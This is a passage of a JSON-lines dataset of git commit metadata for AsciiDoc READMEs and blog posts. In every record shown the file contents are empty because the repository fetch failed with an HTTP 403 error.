2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c82423227df4b58dfc99f66f06ccb0538147a4f","subject":"Updated Travis badge to svg [skip ci]","message":"Updated Travis badge to svg [skip ci]","repos":"sk413025\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81853a37fb4f6861220c727c967977797e02a71c","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65e809bb2323ea1ad58e10a021894578e78f22b3","subject":"Added link to FAQ","message":"Added link to 
FAQ","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a05538e0384cc9f4be525904b106ec8913e136db","subject":"Fix openstack command in README","message":"Fix openstack command in README\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f67dc65b216c2d2af13e29657ae3d8b2ab31c9c","subject":"Create README.adoc","message":"Create README.adoc","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd421c0ddae096d7705e597a5224b361900d1b0e","subject":"README.adoc","message":"README.adoc\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/konstruktoid\/hardening.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"debb2d7e9e9f3c0ca14849ac105947efe6356acd","subject":"Fix @pfalcon comments","message":"Fix @pfalcon comments","repos":"pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd415bb92ffcd61ee0bda43c2b92285a4c8623e5","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"burmanm\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,ppalaga\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,vrockai\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,jshaughn\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,jshaughn\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,vrockai\/hawkular-metrics,pilhuhn\/rhq-metrics,vrockai\/hawkular-metrics,vrockai\/hawkular-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,burmanm\/hawkular-metrics,hawkular\/hawkular-metrics,jsanda\/hawkular-metrics,pilhuhn\/rhq-metrics,jotak\/hawkular-metrics,jsanda\/hawkular-metrics,jsanda\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,jsanda\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,140293816\/Hawkular-fork,vrockai\/hawkular-metrics,140293816\/Hawkular-fork,tsegismont\/hawkular-metrics,140293816\/Hawkular-fork,jsanda\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,Jiri-Kremser\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,jshaughn\/hawkular-metrics,140293816\/Hawkular-fork,hawkular\/hawkular-metrics,jshaughn\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a744a26a1675a84a1ae22754758dbade823bcab8","subject":"Final 1.0","message":"Final 1.0","repos":"schnawel007\/jsEventBus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/schnawel007\/jsEventBus.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e4fa5635c0652e7d6a7f1ff3fd5939bb142ffb","subject":"update usage","message":"update usage\n","repos":"cranej\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cranej\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e009ea36298f178f1a7a6434219199dcd0d9c2d","subject":"Incorrect example in `README.adoc`","message":"Incorrect example in `README.adoc`\n\ns\/emerald::start(&addr, None);\/emerald::start(&addr, None, None);\/.\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27ccf5dffe2b27442675e216f56be8a7fc75257f","subject":"Create README.adoc","message":"Create README.adoc","repos":"weghst\/setaria,weghst\/setaria","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/weghst\/setaria.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"c017d6bef2e797e57001466036e345648f72c04c","subject":"Create README.adoc","message":"Create README.adoc","repos":"asciidoctor\/default-to-asciidoc-chrome-extension","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/default-to-asciidoc-chrome-extension.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e46a7b833db3441f1b808824c66061d879f721","subject":"README\u3092\u66f8\u3044\u305f","message":"README\u3092\u66f8\u3044\u305f\n","repos":"matoken\/Chrome_cast","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/matoken\/Chrome_cast.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38688549d96aa434b35bd0cb4b4878fc130471d9","subject":"new README","message":"new README\n","repos":"ridgebacknet\/ridgeback-hunter-db","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ridgebacknet\/ridgeback-hunter-db.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4a9a936357a683ed3eef97caed2136a099877bf3","subject":"feat: added documentation","message":"feat: added documentation\n","repos":"Kronos-Integration\/kronos-step","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-step.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"951198755610bf68b34f3abbdd537d59a158e01b","subject":"Added README.adoc symlink for GitHub.","message":"Added README.adoc symlink for GitHub.\n","repos":"moreati\/u2fval,Yubico\/u2fval","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moreati\/u2fval.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"049fcaf0b1bb787fde5ce170b6bc48963742975f","subject":"Added build status icon to readme","message":"Added build status icon to readme\n","repos":"sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"089f63399238993023aed7d7a092a38745c6deee","subject":"Trying to symlink README.adoc -> README.txt","message":"Trying to symlink README.adoc -> README.txt\n","repos":"ciarand\/exhausting-search-homework","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciarand\/exhausting-search-homework.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"1a2e7b7883b1e3e98dbd3dd52b8f83111953f2b6","subject":"Add the typical README","message":"Add the typical 
README\n","repos":"jenkinsci\/chucknorris-plugin,jenkinsci\/chucknorris-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/chucknorris-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1752ee8bc934f0c0448c454dabf0d02a5ee89d32","subject":"Deleted _posts\/2016-08-11-Test.adoc","message":"Deleted _posts\/2016-08-11-Test.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-08-11-Test.adoc","new_file":"_posts\/2016-08-11-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7da15e5ff858ba517e961da2d9c946846d07a3d3","subject":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","message":"Update 2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_file":"_posts\/2016-10-06-Deepstreamio-Server-on-AWS-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2d1db63db89d0511998799c3c4d6fbeee9b2b36","subject":"y2b create post The Bizarre Pocket Chair - Does It Suck?","message":"y2b create post The Bizarre Pocket Chair - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-23-The-Bizarre-Pocket-Chair--Does-It-Suck.adoc","new_file":"_posts\/2016-11-23-The-Bizarre-Pocket-Chair--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0b2457df7e37dcf4e42289d84a0e9fd95b356ab","subject":"Update 2017-02-21-Tesing-Hub-Press.adoc","message":"Update 2017-02-21-Tesing-Hub-Press.adoc","repos":"meetsandesh\/blogs,meetsandesh\/blogs","old_file":"_posts\/2017-02-21-Tesing-Hub-Press.adoc","new_file":"_posts\/2017-02-21-Tesing-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/meetsandesh\/blogs.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"711716c8247d98b303a8a8afdaec8e6d2b96aba2","subject":"y2b create post Checking Out Microsoft Office 365","message":"y2b create post Checking Out Microsoft Office 365","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-20-Checking-Out-Microsoft-Office-365.adoc","new_file":"_posts\/2016-01-20-Checking-Out-Microsoft-Office-365.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2adaeb4ae3a44ef0e4156ec169439aebf6e8dd27","subject":"y2b create post Uncharted 3 Collector's Edition Unboxing","message":"y2b create post Uncharted 3 Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-01-Uncharted-3-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-01-Uncharted-3-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcbb0a73accad22ab892e61f2e376ae46e1d5c1c","subject":"new hosa blog (#304)","message":"new hosa blog (#304)\n\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/04\/05\/deploy-hosa-easily.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/04\/05\/deploy-hosa-easily.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7c69d14e772ab3ba1303601b24b2ceb53f86487","subject":":memo: nodejs-azure-sqlserver-mssql","message":":memo: nodejs-azure-sqlserver-mssql\n","repos":"syon\/refills","old_file":"src\/refills\/javascript\/nodejs-azure-sqlserver-mssql.adoc","new_file":"src\/refills\/javascript\/nodejs-azure-sqlserver-mssql.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a44aa83479dbb37c3ff9422f3821c4ead42a0694","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a0f9217e05cf9d76a3ac9c658d3cdc511d07f58","subject":"y2b create post Skyrim Collector's Edition Unboxing","message":"y2b create post Skyrim Collector's Edition 
Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-11-Skyrim-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-11-Skyrim-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d65d04e0edf67cc8cd2cc54b7f22513566ccbd9e","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa128f8a006c0e9d77bb595409d0e43b4994aad4","subject":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","message":"Update 2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_file":"_posts\/2017-02-07-Best-practices-for-docker-compose-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c515f30355a95a1f45a283edb43b2d4aa850a41f","subject":"y2b create post Unlock Any MacBook Without The Password","message":"y2b create post Unlock Any MacBook Without The Password","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-29-UnlockAnyMacBookWithoutThePassword.adoc","new_file":"_posts\/2017-11-29-UnlockAnyMacBookWithoutThePassword.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d209d79bc14d8859fb8c8d031a6c2d9fe3dc25b","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 
2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5da3cea82d9a4d8d2ab620984cc56c67329df3e","subject":"added table of content in HTML output","message":"added table of content in HTML output\n\n[ci skip]\n","repos":"yinheli\/jPOS,sebastianpacheco\/jPOS,juanibdn\/jPOS,alcarraz\/jPOS,c0deh4xor\/jPOS,atancasis\/jPOS,alcarraz\/jPOS,jpos\/jPOS,bharavi\/jPOS,juanibdn\/jPOS,yinheli\/jPOS,barspi\/jPOS,c0deh4xor\/jPOS,yinheli\/jPOS,sebastianpacheco\/jPOS,atancasis\/jPOS,poynt\/jPOS,poynt\/jPOS,alcarraz\/jPOS,barspi\/jPOS,sebastianpacheco\/jPOS,bharavi\/jPOS,c0deh4xor\/jPOS,juanibdn\/jPOS,jpos\/jPOS,poynt\/jPOS,jpos\/jPOS,barspi\/jPOS,atancasis\/jPOS,bharavi\/jPOS","old_file":"doc\/src\/asciidoc\/master.adoc","new_file":"doc\/src\/asciidoc\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jpos\/jPOS.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"889bd661fc86a397c384edfefe021494a5008b0b","subject":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2017-07-20-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39444f8d167a73d5a197e8db9d7a631322cdb3a4","subject":"Sorted out Auto instr","message":"Sorted out Auto instr\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e07f34b5c3d5d1ba255af30617b188de3a3c93","subject":"y2b create post Back To The Future 25th Anniversary Blu Ray Unboxing \\u0026 Overview + Macro Shots!","message":"y2b create post Back To The Future 25th Anniversary Blu Ray Unboxing \\u0026 Overview + Macro 
Shots!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-01-13-Back-To-The-Future-25th-Anniversary-Blu-Ray-Unboxing-u0026-Overview--Macro-Shots.adoc","new_file":"_posts\/2011-01-13-Back-To-The-Future-25th-Anniversary-Blu-Ray-Unboxing-u0026-Overview--Macro-Shots.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6f6324856ab7d561870f98dab8d3969e246ba3c","subject":"Add a Neo4j extension guide","message":"Add a Neo4j extension guide\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/neo4j-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/neo4j-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f55e728cde7db2a27ceff92bcc982b01f15039b9","subject":"Renamed '_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc' to '_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc'","message":"Renamed '_posts\/2017-09-21-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc' to '_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc'","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_file":"_posts\/2018-02-14-Fencing-RHV-or-o-Virt-nested-hypervisors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0293e4bb382cbf677d82d91be18d39fa2a02b1","subject":"Update 2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","message":"Update 2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","new_file":"_posts\/2015-07-04-Ostanovit-zapushenyj-Wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1307b0d9aa3312498da651d8cbde6c480d247443","subject":"Update 2016-02-28-First-Post.adoc","message":"Update 2016-02-28-First-Post.adoc","repos":"johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io,johannewinwood\/johannewinwood.github.io","old_file":"_posts\/2016-02-28-First-Post.adoc","new_file":"_posts\/2016-02-28-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/johannewinwood\/johannewinwood.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3998ca6253265ec6236babab71c97f2923c7bf75","subject":"y2b create post iPhone 6 Impostor - Runs Android","message":"y2b create post iPhone 6 Impostor - Runs 
Android","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-22-iPhone-6-Impostor--Runs-Android.adoc","new_file":"_posts\/2014-08-22-iPhone-6-Impostor--Runs-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da71c4866af657876f80f407c7bbf6e9ab300ea2","subject":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","message":"Update 2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_file":"_posts\/2017-10-22-Erste-Devoxx4-Kids-in-Paderborn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de0dfbe63daa525033ea2983db92157447b8e9d","subject":"Update 2015-09-29-One-click-to-run-Apiman-on-Fabric8.adoc","message":"Update 